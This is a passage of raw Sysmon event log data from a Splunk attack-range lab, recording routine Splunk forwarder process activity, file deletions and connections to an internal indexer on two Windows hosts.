Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285684Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:19.459{C8EA50B7-0F13-6216-BD04-000000003802}4900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000214828Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:17.573{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51216-false10.0.1.12-8000- 23542300x8000000000000000214827Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:19.146{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8BDA092C26010880432DE058160B333,SHA256=88173D86BA5A8B3FD4A54BB644D4B8AC246075F862AD34853D36080CDDCBE9F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285714Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:20.739{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AD37F876C384B0340D2D0A8A0EA3B93,SHA256=6BC4E6D2D277BF7F0A7972E655749EAD529938212966F269A5F37A21B3053E72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214829Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:20.146{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21CF7111122A56906644BFBAB5A9CBC6,SHA256=4E46A27F7B423F0E89EDEED21588F720F58E6B3CF067E040630C4B0383157FB6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285713Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:20.630{C8EA50B7-0F14-6216-BF04-000000003802}38564380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000285712Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:20.473{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1AA2CF4B98901BBFE660AC94F2EDE345,SHA256=1A4D67064C717B81AA2E208FDB8E0514870C9010DD954D08A7E37FBF2E48CEC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285711Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:20.473{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=72641051AA7C38130BBA4327C7551573,SHA256=3AAB7E3351AD2222FF05DAD048B5D6C2B9F623714022D8EC335A77A1FFEBD2A3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285710Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:20.458{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0F14-6216-BF04-000000003802}3856C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285709Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:20.458{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285708Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:20.458{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285707Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:20.458{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285706Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:20.458{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-0F14-6216-BF04-000000003802}3856C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285705Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:20.458{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285704Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:20.458{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0F14-6216-BF04-000000003802}3856C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285703Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:20.459{C8EA50B7-0F14-6216-BF04-000000003802}3856C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000285702Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:20.208{C8EA50B7-0F13-6216-BE04-000000003802}42403336C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000285723Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:21.817{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E917A473868EA490D4E6FC6EA4BB034,SHA256=B26FB2F1DE2BB8276EB10FBA7B313F34C0F56A38DECFBA8DED50EC51E770F88E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214830Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:21.162{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D36392EC97BE328AFA0BB175A311B089,SHA256=63C843BFF7C6EF11A3197F9A11E52DBD34C7210595818C5532325E2AD3EEE410,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285722Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:21.130{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0F15-6216-C004-000000003802}5972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285721Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:21.130{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285720Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:21.130{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285719Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:21.130{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285718Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:21.130{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-0F15-6216-C004-000000003802}5972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285717Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:21.130{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285716Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:21.130{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0F15-6216-C004-000000003802}5972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285715Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:21.131{C8EA50B7-0F15-6216-C004-000000003802}5972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000285726Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:22.864{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D326C9FBC7F61A8D37C3494BC8D9B5C5,SHA256=394AE25A150E11FE707B6114E864E9C6F1EFEBE193B7468F2F105633E61755A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214831Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:22.178{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFF67171699695C4B8E74AB814C3D4AF,SHA256=1C5CB4A6D03CA4A4CE9FB8C29F437CC9AD469FAC9106AD4B097412F0310FE297,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285725Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:19.590{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53279-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285724Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:22.177{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1AA2CF4B98901BBFE660AC94F2EDE345,SHA256=1A4D67064C717B81AA2E208FDB8E0514870C9010DD954D08A7E37FBF2E48CEC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285727Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:23.895{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A27DCFCF344E213A3E27D2D8308275CB,SHA256=8F5068EFB85983DD8F664FDE2CB30539812B20AA711FBE248CF2CCFAC63E61ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214832Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:23.193{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B96B7C18D7EE5C7EAF98F9BCCCBB8BB6,SHA256=9D4A7E28122B56001605EBE34E160AC52153FFCD60151B3F4B64BD59EE5E87FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285728Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:24.927{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C5E34B44113ABC4638E053FC025CD00,SHA256=98289EC42A8C494644DA66AC2BF9B1B958DAC1F043FA2E7D8F658D32D4DA1231,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214833Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 